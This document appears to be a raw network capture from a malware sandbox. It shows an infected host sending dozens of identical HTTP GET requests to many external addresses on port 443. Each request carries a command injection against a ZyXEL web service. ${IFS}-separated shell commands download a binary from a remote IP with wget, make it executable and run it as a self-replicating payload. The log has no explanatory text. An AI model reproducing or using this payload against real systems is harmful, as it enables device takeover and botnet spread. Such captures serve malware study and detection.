                                              Jan 29, 2024 07:04:03.276388884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7645192.168.2.145164267.38.67.56443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276416063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7646192.168.2.1437378165.132.176.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276448011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7647192.168.2.1455168184.175.229.106443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276494980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7648192.168.2.143334042.56.106.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276530027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7649192.168.2.1449052122.209.51.255443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276566029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7650192.168.2.144287854.30.219.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276593924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7651192.168.2.144892264.29.171.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276648998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7652192.168.2.1458688211.218.145.115443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276674032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7653192.168.2.1436282171.154.34.203443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276730061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7654192.168.2.145030841.91.173.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276767969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7655192.168.2.145955054.211.32.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276806116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7656192.168.2.1447562189.71.79.180443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276849985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7657192.168.2.1460408137.124.193.82443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276876926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7658192.168.2.144459059.211.20.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276906967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7659192.168.2.14373809.63.97.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276942015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7660192.168.2.1433868216.38.179.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.276974916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7661192.168.2.144633439.118.33.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277018070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7662192.168.2.1449126202.138.14.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277077913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7663192.168.2.144765627.161.45.87443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277107000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7664192.168.2.145187897.198.167.138443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277163982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7665192.168.2.143382619.11.72.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277199984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7666192.168.2.1446810140.222.17.198443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277230978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7667192.168.2.146083872.95.113.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277260065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7668192.168.2.1443486110.219.64.110443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277297020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7669192.168.2.143547495.107.54.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277338982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7670192.168.2.1445400183.57.61.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277369022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7671192.168.2.1449180173.85.233.243443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277419090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7672192.168.2.1458258133.147.36.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277435064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7673192.168.2.1439908161.116.237.193443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277475119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7674192.168.2.1451748166.100.75.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277524948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7675192.168.2.1439002199.23.70.238443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277549028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7676192.168.2.1447790124.112.225.94443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277578115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7677192.168.2.1440600118.66.84.248443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277631044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7678192.168.2.1441072221.200.94.97443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277669907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7679192.168.2.145071257.216.14.211443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277718067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7680192.168.2.1457694133.167.85.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277741909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7681192.168.2.1454660180.86.71.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277785063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7682192.168.2.1458426158.196.176.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277806044 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7683192.168.2.1435480104.236.163.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277854919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7684192.168.2.146054672.23.11.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277901888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7685192.168.2.1438394203.68.177.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277931929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7686192.168.2.145209019.122.188.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.277961969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7687192.168.2.1445666118.55.68.210443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278006077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7688192.168.2.1452834147.188.172.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278054953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7689192.168.2.1445014180.196.5.207443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278106928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7690192.168.2.1439056210.113.255.122443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278161049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7691192.168.2.1448252105.119.152.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278187037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7692192.168.2.145013047.208.207.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278218985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7693192.168.2.144284872.185.200.1443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278297901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7694192.168.2.145446025.140.215.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278323889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7695192.168.2.1445196129.34.110.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278362036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7696192.168.2.1438310165.135.83.62443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278417110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7697192.168.2.1435736153.118.130.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278451920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7698192.168.2.1450954150.100.90.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278486967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7699192.168.2.1451172113.155.114.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278521061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7700192.168.2.143537037.74.43.234443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278553009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7701192.168.2.14438429.151.70.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278604984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7702192.168.2.1436828178.73.170.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278635979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7703192.168.2.144540289.35.54.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278666973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7704192.168.2.1445174184.196.147.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278701067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7705192.168.2.145168438.22.71.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278729916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7706192.168.2.1459866119.193.167.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278762102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7707192.168.2.1457080161.129.233.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:03.278808117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7708192.168.2.1433448218.162.53.213443
                                              TimestampBytes transferredDirectionData
